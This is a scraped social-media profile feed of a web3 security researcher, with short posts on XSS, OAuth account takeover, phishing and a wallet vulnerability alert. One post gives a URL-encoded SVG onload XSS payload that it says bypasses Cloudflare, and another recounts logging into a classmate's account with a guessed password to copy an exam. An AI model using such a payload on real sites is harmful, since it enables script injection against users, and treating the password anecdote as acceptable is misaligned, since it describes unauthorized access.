souilos
@theSouilosSecurity Researcher 🥷 Securing Web3 by targeting Web2 weaknesses || Born in 🇫🇷 living in 🇦🇷
XSS Payload bypassing CloudFlare <Svg%20Only=1%20OnLoad=confirm(atob(%27Q2xvdWRmbGFyZSBieXBhc3NlZA==%27))>
Very interesting: « Universal Code Execution by Chaining Messages in Browser Extensions » spaceraccoon.dev/universal-code…
Using that checklist allowed me to find an account takeover on the very first web app I checked. As more and more apps use OAuth, check that out: medium.com/@Az3m/account-…
Read “How I Found an SQL Injection in coupon code“ by Ghee1337 on Medium: medium.com/@gheeX/how-i-f…
🚨 Alert for Frontier Wallet Users! 🚨 ⏩Create a new seed in a secure wallet and transfer your funds ASAP.⏪ Any website can access your private keys. Despite our attempts to contact @FrontierDotXYZ over the past year, we have received no response. ⏳📣Tech details next week.
Nice job by @theredguild very good security awareness on phishing campaigns: phishing.therektgames.com
Since its launch a year ago, my web3 security company has both paid out to security researchers & profited >$1,000,000 USD. Secured Aave, Uniswap, LayerZero, Ethena. We are celebrating with a giveaway. You need to like, retweet & comment. 4 winners, $500 each, 48hrs. Good luck🫡
My dream position? A security position in Web3, showing how Web2 attacks vectors are present in Web3 hacks. Working closely with clients and security researchers to enhance protocols and users security.
OpenRedirect to XSS This vulnerability could allow an attacker to: Steal user session cookies Perform phishing attacks Deface the website Take control of user accounts
🚨 Beware of scammers! 🚨 Certora doesn’t request NFTs at any of our events. If you see someone doing this, it’s not us. Stick to our official channels for updates and stay safe!
Is Oauth safe? It depends. If once authenticated (with Fb or Google) you can change the email address of the account without having to verify it, this can lead to account spoofing. Then if you can set a new password it’s an account takeover.
Finding vulnerabilities in malicious web apps used for phishing campaigns.
I remember my first hack it was at University. Let’s say I was not the best student when I was not interested into something. The best student of the class has for password on Google is birthday date… I copied / pasted the whole exam and had a better grade than him.
It's unfortunate to see amazing projects or new companies making millions and underestimating security. We report bugs, it's ok if you don't wanna do security audits but PLEASE PATCH THE VULNERABILITIES FOR THE SAKE OF YOUR USERS. If you don't care, we do.
A successful phishing campaign will probably combine different techniques such as Spear Phishing + Vishing.
80% of recent losses in Web3 came from hacking people, not smart contracts Excited to have @PabloSabbatella , OpSec & Blockchain Security researcher @_SEAL_Org , speaking at DSS 2024! In his talk "Professionals hack people, not systems", Pablo will walk you through real cases…
United States Trends
- 1. Jake Paul 1,03 Mn posts
- 2. #Arcane 228 B posts
- 3. Jayce 52,4 B posts
- 4. Good Saturday 26,5 B posts
- 5. #SaturdayVibes 3.190 posts
- 6. Serrano 249 B posts
- 7. #saturdaymorning 2.136 posts
- 8. #PlutoSeriesEP5 138 B posts
- 9. AioonMay Limerence 112 B posts
- 10. Vander 17,1 B posts
- 11. Pence 82,2 B posts
- 12. #SaturdayMotivation 2.081 posts
- 13. maddie 21,4 B posts
- 14. Caturday 7.548 posts
- 15. WOOP WOOP 1.428 posts
- 16. John Oliver 14,5 B posts
- 17. Jinx 111 B posts
- 18. Fetterman 37,1 B posts
- 19. Father Time 10,9 B posts
- 20. He's 58 31,7 B posts
Something went wrong.
Something went wrong.